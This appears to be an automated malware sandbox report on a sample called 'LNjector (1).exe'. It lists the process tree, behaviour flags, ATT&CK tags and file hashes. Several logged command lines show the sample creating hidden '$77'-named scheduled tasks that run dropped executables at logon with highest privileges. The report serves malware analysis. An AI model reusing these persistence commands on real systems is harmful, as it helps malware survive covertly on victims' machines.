- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4604
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1456
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2900
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1476
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2000
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2136
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2644
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3196
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\LNjector (1).exe"C:\Users\Admin\AppData\Local\Temp\LNjector (1).exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Users\Admin\AppData\Local\Temp\03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe"C:\Users\Admin\AppData\Local\Temp\03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77oui" /tr '"C:\Windows\SysWOW64\$77oui.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77oui" /tr '"C:\Windows\SysWOW64\$77oui.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp15B6.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5108
-
-
C:\Windows\SysWOW64\$77oui.exe"C:\Windows\SysWOW64\$77oui.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\acc449ba-d046-4b86-956f-10f8d1ac6d73.exe"C:\Users\Admin\AppData\Local\Temp\acc449ba-d046-4b86-956f-10f8d1ac6d73.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77non" /tr '"C:\Windows\SysWOW64\$77non.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77non" /tr '"C:\Windows\SysWOW64\$77non.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp15B7.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3688
-
-
C:\Windows\SysWOW64\$77non.exe"C:\Windows\SysWOW64\$77non.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\369e383a-9351-4c3d-ad14-5c551fd60479.exe"C:\Users\Admin\AppData\Local\Temp\369e383a-9351-4c3d-ad14-5c551fd60479.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3568
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4988 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff83af746f8,0x7ff83af74708,0x7ff83af747183⤵PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:23⤵PID:3768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:33⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:83⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:13⤵PID:1892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:13⤵PID:4732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:13⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:13⤵PID:5244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:83⤵PID:5464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:83⤵PID:5484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:13⤵PID:5668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4280 /prefetch:13⤵PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:13⤵PID:5852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:13⤵PID:6096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:13⤵PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:13⤵PID:4244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:13⤵PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:13⤵PID:5344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5400 /prefetch:83⤵PID:2712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:13⤵PID:5460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,190968999088484323,11662635058226681574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:83⤵PID:1736
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3620
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3824
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3980
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3104
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4460
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4232
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3836
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:2108
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1604
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2232
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3964
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:4520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:1380
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:640
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3000
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3528
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3832
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6128
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2500
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
152B
MD534d2c4f40f47672ecdf6f66fea242f4a
SHA14bcad62542aeb44cae38a907d8b5a8604115ada2
SHA256b214e3affb02a2ea4469a8bbdfa8a179e7cc57cababd83b4bafae9cdbe23fa33
SHA51250fba54ec95d694211a005d0e3e6cf5b5677efa16989cbf854207a1a67e3a139f32b757c6f2ce824a48f621440b93fde60ad1dc790fcec4b76edddd0d92a75d6
-
Filesize
152B
MD58749e21d9d0a17dac32d5aa2027f7a75
SHA1a5d555f8b035c7938a4a864e89218c0402ab7cde
SHA256915193bd331ee9ea7c750398a37fbb552b8c5a1d90edec6293688296bda6f304
SHA512c645a41180ed01e854f197868283f9b40620dbbc813a1c122f6870db574ebc1c4917da4d320bdfd1cc67f23303a2c6d74e4f36dd9d3ffcfa92d3dfca3b7ca31a
-
Filesize
687KB
MD56ff7741ae2e484a15ee4b90ffc3920a7
SHA1141b7d28bbd6f3c9752e4b834276af67b494d84c
SHA25632fa228aa4791f1b05d4ad734a6a81f0afd0c049fc6067b1450c88b5f7e94d2e
SHA51229ff13c203fb909b9f657b8c3f2c4fd12251da96a1a42418c6b382886e17fe532db11111fc4be8eaf0db1586866dd298d5e834751dbdd92cb38954c73f2ee56b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD5247c6d4bbf6828fcc456df6417e23713
SHA1a06d655a17ad7204d1445bb701c7aff7a28c6e32
SHA2568307c395135b826b2c77634cc9d1bfeab0a149cb5d6bf91ebe4d6bb623e8b9c0
SHA512965a1f3562e1069553fd675c7f2f3081a090bdc6482ff04713b8d52d69d49f217c1cd18327f04720a6edfe4bef4ce301e36c02ef6b7c2199b6a301c92f1c4de3
-
Filesize
964B
MD585d486c202bcc4cc57bab6ba9e1a9c25
SHA12f03de052fafeee53d465cb6d5ff729252b9bbf6
SHA256163dfcdd577047dafa5c1f61976ba79a154265392948f868d147c3ad146d09dd
SHA512ac2ddb873e9cba8ec6469990f336c68933dc07d3695824c03634139e18f59fb7cbbbc4eea282b1c023b7891877becffd2bc5a792a0279da05ceac2579f8f44d5
-
Filesize
6KB
MD53202e816ae63848af8058e403d4ee7d4
SHA1f16501b609db3163ebf7fb6b48771aa1a050ed9c
SHA2562a43001fea99c655c7fdea8fc785c2a4347b731151c0f693a018cfe69da8072b
SHA512f9c7a5f60ee2a6c48b94155e89bb456f8959633235f4518dd943b5e4a5605e998a1ccde8e5426ae2ff68331b3a0ee873d0f36a5fc0129c104a035c2bf0aa1058
-
Filesize
5KB
MD5c80d40f33673c5c33196309067934109
SHA1537402cf48347dda72d39b8b52053d59bd48d800
SHA256de4251137db6c05b1e89dffb5d5c7ec808d2ba07d7c3a10ccce4bc9aaa0a4f61
SHA51230132e21f45fd55c972205c54fad47b3eba574f31b3eac1962c099618acbb82b4c9048b5ebdd00e8463976b33b82f7563b22010157cc2a9d348a3c5719c7c666
-
Filesize
6KB
MD54adfe8ffe560ad6af8ab66e0d52114e3
SHA1b1e3dc4f393718710c4b771a525160de1aa99894
SHA25618256874a5432e3586fb140e4b517ceaf346cf7b8a5cb582a1955e536693d13d
SHA5125ce4018382886f06b408fa5336fdeacf918558126b5662f9ba0b65270333cd271cefab792bc0fe5e76e115b0080c9b827124b155f016b6037e0ac2d1f46e9c91
-
Filesize
6KB
MD5685e23c10bc4dc27233573e428c33e39
SHA14d3f62ac20c7d3b32f9a62e1216ba3f787727252
SHA256cb68fac2a40267b267088752cfd79928e74bcc2c6c453fa785041b9ad8485892
SHA51201b4cfc8950e9cbddb028b969194dd6c129f5b69a3614981b7970d91646bf4a3e325e5aa4d9b4e6b8b8b0c6b434abd22e9c420e5b38d5b4af710baf5be184a9c
-
Filesize
1KB
MD53e7aefb17f0953f5ca91e3e8ad48ce54
SHA11933544e8621530e66435c67ef972fb05beb8b7b
SHA2565083e07fce09afcd9ec91d5abffa3fecad0f6b079ba52b6b5c3249e31eb92f8e
SHA512d7482514448c381bcfec11f7b9b57d953ef2be5aa4732cd712e1257cf3e5a6038867ddea8feeb9b78d721dab6b25689f0d3c323919102be2e392525518738de6
-
Filesize
1KB
MD577df3f197557831f16cf0821baf7daff
SHA1ba2e3e983955b514dfa2c6e6f5fd9698175cfed9
SHA256aff58247eadd1568c289548ab745d9fc90b37ef97ea66043f14f54cd3920ac5c
SHA51272e7208f55ff90b6c9094078dfa9f2f45b3effd1e36da948b67871747fcac3c66d7f96e3893a4c8dcb54f714cf45826cb6fe92c1492d63aec6545bc999bc5280
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD52f143ef9b8e35437d985f8b1de217106
SHA15fb49672d5f6b10048d960fa4ac6be805102b27c
SHA2562e223099ab82892a366ac33e9a5c172b901cd94f46be30bbb4a3462597e31078
SHA5120b8bc4a745816292aa52660bdecbbc030a7b13cc87a9158a339fdad786b691e76b4acd4595b06e96f426127a1cfb034910b79a638697171c28e783151f437b56
-
Filesize
10KB
MD5ba543da7963e6ca68218828f35c98b02
SHA1318d02d0d0bb5d45cbf97983012148634ce60e63
SHA256197d1c1a931a345d54a6f3d4cb05a86f4a5eec6ffaa8b24fb54bd9f98120dcf5
SHA51229a72abff7b4907004193b687d348404b93cc877f3995e5f2b9a7bf7248d021ef6ba0d5b8f3bf80b0416b8946d0f169b32096a111bda7539fced6427b5abcad0
-
Filesize
2KB
MD5402c3f48af4b254fd33c130f0639e312
SHA1f0668e6a1cfb84b7ad056762299e68ebf5ec2aa7
SHA25639c278989a230bf0f6f6082149afb2790675e1774b275ca4f60b34c85b88a1c2
